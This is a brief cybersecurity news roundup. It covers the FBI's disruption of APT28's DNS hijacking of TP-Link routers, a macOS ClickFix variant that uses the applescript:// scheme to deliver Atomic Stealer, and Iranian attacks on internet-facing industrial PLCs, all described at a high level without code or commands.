The U.S. Department of Justice has successfully disrupted a large-scale DNS hijacking operation conducted by the Russian GRU-linked group APT28. The campaign compromised thousands of TP-Link routers to redirect DNS queries through GRU-controlled infrastructure, enabling the theft of credentials and sensitive data from government, military, and critical infrastructure sectors. The FBI-led 'Operation Masquerade' restored legitimate DNS settings and blocked further unauthorized access to the affected devices.
In the macOS ecosystem, researchers have identified a new variant of the 'ClickFix' social engineering attack that bypasses Apple's latest Terminal-based mitigations. By utilizing the applescript:// URL scheme, attackers can pre-populate the macOS Script Editor with malicious code, delivering the Atomic Stealer (AMOS) malware without requiring users to copy-paste commands. This evolution highlights a persistent cat-and-mouse game between OS security updates and malware delivery mechanisms.
Additionally, Iranian state-sponsored actors are targeting U.S. critical infrastructure by exploiting internet-facing programmable logic controllers (PLCs). These attacks have impacted the energy, water, and wastewater sectors by disrupting operations and manipulating data displays. The campaign utilizes legitimate OT configuration tools to deploy remote access tools, reinforcing the urgent need for hardening internet-exposed industrial control systems.
Top comments (0)